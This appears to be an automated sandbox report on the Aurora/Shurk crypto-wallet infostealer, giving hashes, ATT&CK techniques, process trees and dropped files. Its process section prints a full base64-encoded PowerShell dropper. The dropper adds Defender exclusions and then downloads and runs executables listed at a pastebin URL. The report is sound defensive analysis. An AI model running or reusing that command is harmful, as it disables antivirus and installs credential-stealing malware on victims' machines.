aurora | 4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0

General

Target

Aurora.exe
Size

25.5MB
MD5

5b5049eee909a12420356f785890ee12
SHA1

2458920623ab942e1f564cb09ae25fb02b6b76a0
SHA256

4e68fa05c32bcd3790d93809a53be10bc4b0b1023dfaef3b101ef0f29a62efd0
SHA512

5c7fecb1d55baa008ee4fa90a08c0a1dbbcb2635082a6df51bdacf6fde9fe878f36769fd8099f5a0c371b3e60e5d4ff8e4097bf38346f7167d0a13c9bcdc310c
SSDEEP

98304:UlQKxQh+98myGsy1slENtrE7pQ8kq34vEStCAsDrP7J8yStyBCWLRV7VtC4bksxA:QQPY9mgGvkHEAsdtLRVRXgFqKQbEZxRF

Score

10^/10

aurora shurk infostealer stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/tPAFrSUD

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1856-134-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral2/memory/1856-146-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Aurora.exeLXIX.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	Aurora.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	LXIX.exe

Executes dropped EXE 1 IoCs

Processes:

LXIX.exe

pid process

4100 LXIX.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2012 powershell.exe
2012 powershell.exe
2216 powershell.exe
2216 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2012 powershell.exe
Token: SeDebugPrivilege 2216 powershell.exe

pid	process
4100	LXIX.exe

pid	process
2012	powershell.exe
2012	powershell.exe
2216	powershell.exe
2216	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

Aurora.exeLXIX.exepowershell.exe

description	pid	process	target process
PID 1856 wrote to memory of 4100	1856	Aurora.exe	LXIX.exe
PID 1856 wrote to memory of 4100	1856	Aurora.exe	LXIX.exe
PID 1856 wrote to memory of 4100	1856	Aurora.exe	LXIX.exe
PID 4100 wrote to memory of 2012	4100	LXIX.exe	powershell.exe
PID 4100 wrote to memory of 2012	4100	LXIX.exe	powershell.exe
PID 4100 wrote to memory of 2012	4100	LXIX.exe	powershell.exe
PID 2012 wrote to memory of 2216	2012	powershell.exe	powershell.exe
PID 2012 wrote to memory of 2216	2012	powershell.exe	powershell.exe
PID 2012 wrote to memory of 2216	2012	powershell.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Aurora.exe
"C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1856

C:\Users\Admin\AppData\Local\Temp\LXIX.exe
"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
56KB

MD5
d8d5aa8896bf31e099f76b2f43a6364f

SHA1
294afc5947dce388487452b0a5e801a1994d790b

SHA256
06afa405cd3983c3aeccff1dd91e8e053e89bf344eecf66ce70a09e6f2f4399b

SHA512
3305c2be4443dbf00c066f3f3d99a12966be13fa630dd2bc393474d40534ec083c1aac52930c6499e9101441422ea4b8f96aefedf4ad6b589c4627e13a886dfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
52KB

MD5
7e0e3ddfc46ebd6e1fc757aa60936337

SHA1
25b3050fadb73dd73af5281ad875b3b859f9b756

SHA256
5e6731a07f7602cb83e6c1fc681cc397df053e13b0c8d15827aaf44391aa4c24

SHA512
6bb2c6fa47338dc016bc9a12270ebea4ef5e298334b0bb75e9da776582ff7b7d79a39949c543cb1211d25d27d75ecb9a8f1b1f47735c8284f3a2da9cafe20824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
3870e912689df2dc7da86098bbe6a37d

SHA1
a14ceb66aab141e56e6728d69d2947418a5990a2

SHA256
ee25d19b22345c1ee78d23f4be6a33d11c857b4a087872675ba7c85cd44282d0

SHA512
a2b5149bbb49f4b23f4d8d5c013e8a5fa6de6376acad442a89205e5bcfc28bc946a29952c4cc77b5d82b9313886b8556720a60fdaf0025d80630af691def6ab5

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
49aa48d942e55dbff5f93d46af47ee788aa7c7aef4ed993c37fe8f5f9840b37d70866f9445df8883b52d73794e11b93bbfffcada6109c7b1be35fae6ef2d4c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03rexfh4.knp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1856-146-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/1856-134-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download
memory/2012-166-0x0000000007990000-0x0000000007A26000-memory.dmp

Filesize
600KB

Download
memory/2012-197-0x0000000007C40000-0x0000000007C5E000-memory.dmp

Filesize
120KB

Download
memory/2012-153-0x0000000006020000-0x0000000006086000-memory.dmp

Filesize
408KB

Download
memory/2012-159-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/2012-151-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/2012-164-0x0000000006680000-0x000000000669E000-memory.dmp

Filesize
120KB

Download
memory/2012-165-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/2012-150-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/2012-167-0x00000000078F0000-0x000000000790A000-memory.dmp

Filesize
104KB

Download
memory/2012-168-0x0000000007940000-0x0000000007962000-memory.dmp

Filesize
136KB

Download
memory/2012-169-0x0000000007FE0000-0x0000000008584000-memory.dmp

Filesize
5.6MB

Download
memory/2012-170-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/2012-206-0x0000000006860000-0x000000000686A000-memory.dmp

Filesize
40KB

Download
memory/2012-147-0x0000000005190000-0x00000000051C6000-memory.dmp

Filesize
216KB

Download
memory/2012-183-0x0000000007D80000-0x0000000007DB2000-memory.dmp

Filesize
200KB

Download
memory/2012-184-0x00000000710D0000-0x000000007111C000-memory.dmp

Filesize
304KB

Download
memory/2012-194-0x000000007F020000-0x000000007F030000-memory.dmp

Filesize
64KB

Download
memory/2012-148-0x0000000005800000-0x0000000005E28000-memory.dmp

Filesize
6.2MB

Download
memory/2012-200-0x000000007F020000-0x000000007F030000-memory.dmp

Filesize
64KB

Download
memory/2012-152-0x0000000005740000-0x0000000005762000-memory.dmp

Filesize
136KB

Download
memory/2012-149-0x0000000005180000-0x0000000005190000-memory.dmp

Filesize
64KB

Download
memory/2216-196-0x0000000002330000-0x0000000002340000-memory.dmp

Filesize
64KB

Download
memory/2216-195-0x0000000002330000-0x0000000002340000-memory.dmp

Filesize
64KB

Download
memory/2216-172-0x0000000002330000-0x0000000002340000-memory.dmp

Filesize
64KB

Download
memory/2216-205-0x0000000007180000-0x00000000077FA000-memory.dmp

Filesize
6.5MB

Download
memory/2216-171-0x0000000002330000-0x0000000002340000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads